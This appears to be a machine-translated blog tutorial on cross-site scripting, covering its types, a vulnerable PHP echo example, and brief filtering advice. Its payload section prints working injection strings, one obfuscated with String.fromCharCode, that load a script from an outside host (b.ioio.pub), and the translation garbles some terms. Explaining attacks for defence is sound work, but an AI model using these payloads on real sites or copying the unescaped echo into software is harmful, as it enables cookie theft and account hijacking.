XSS Vulnerability Analysis

• What is XSS

• 
  

  • Cross Site scripting attacks (Scripting), which are not confused with the abbreviations of cascading style sheets (cascading style sheets,css), are abbreviated as XSS for cross-site scripting attacks. A malicious attacker inserts HTML code into a Web page, and when the page is browsed, the HTML code embedded inside the Web is executed to achieve the special purpose of attacking the user.

• What XSS can do

• 
  

  • Stealing administrator cookies or user cookies

  • XSS Worm

  • Hanging Horse (Puddle Attack)

  • Limited Keylogger

• XSS classification

• 
  

  • Radioactive XSS

  • Storage-Type XSS

  • DOM XSS

  • Flash XSS

  • Mxss

• Reflection (non-persistent) XSS

• 
  

  • When the request is made, the XSS code appears in the URL, the last input is submitted to the server, the server resolves the response in the response content that appears in the XSS code, and finally the browser resolves the execution

  • This process is like a reflection, so it's named reflective XSS.

xss.php<?php echo $_get[' x ']?> #提交/xss.php?x=<script>alert (1) </script>

• Service-side parsing, Echo will complete the output <script>alert (1) </script> into the response body, and then the browser resolution to execute the trigger pop-up window

• Storage (persistent) type XSS

• 
  

  • The difference between a stored XSS and a reflective XSS is that the committed XSS code is stored on the server (either the database/memory/file system, etc.) and the next request to the target page is not to commit the XSS code.

  • The most typical example is the message board XSS, the user submits a message containing the XSS code stored in the database, the target user to view the message board is, those messages will be from the database to check the village out and display, the browser found that there is XSS code, as normal HTML and JS parsing execution, so triggered the XSS attack

  • Storage XSS attacks are the most covert

#eg: http://www.nfpeople.com/user.php?id=21839

• How XSS is used

  • Payload (valid attack code)

<script src= ' http://b.ioio.pub/xss/probe.js ' ></script><svg onload=s=createelement (' script '); Body.appendchild (s); s.src= ' Http://b.ioio.pub/xss/probe.js><svg onload=eval (String.fromCharCode ( 115,61,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,98,111,100,121,46,97,112,11 2,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,98,46,105,111,105,111,46,1 12,117,98,47,120,115,115,47,112,114,111,98,101,46,106,115)) >

• Repair

  • The defense of XSS requires strict filtering of the user's input according to the actual situation. Filtering-based XSS defenses are typically divided into two types: blacklist-based filtering and whitelist-based filtering. The latter's defensive effect is often better, for users outside the white list of input, can be directly ignored. In the process of constructing the whitelist, it is necessary to ensure that the user experience is not affected, as far as possible to eliminate all unnecessary input content.

This article is from the "Creative Pilgrim" blog, so be sure to keep this source http://dearch.blog.51cto.com/10423918/1826827

XSS Vulnerability Analysis